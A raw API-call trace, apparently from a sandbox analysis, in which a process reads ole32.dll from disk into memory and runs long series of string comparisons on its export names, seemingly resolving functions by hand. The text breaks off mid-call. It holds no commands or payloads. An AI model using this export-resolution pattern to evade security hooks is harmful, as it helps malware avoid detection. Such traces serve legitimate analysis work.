GetProcessHeap () returned 0x440000 [0082.134] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x4590a0 [0082.134] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0082.134] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0082.134] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0082.135] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0082.135] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0082.135] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0082.135] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0082.135] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0082.135] GetProcessHeap () returned 0x440000 [0082.135] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x142d00) returned 0x4033040 [0082.221] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0082.221] ReadFile (in: hFile=0x140, lpBuffer=0x4033040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4033040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0082.367] CloseHandle (hObject=0x140) returned 1 [0082.367] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0082.367] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0082.368] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0082.368] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0082.369] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0082.369] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.370] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.371] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.371] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.371] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.371] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.371] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.371] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0082.372] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0082.372] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0082.373] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0082.373] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0082.374] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0082.374] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0082.375] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0082.375] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", 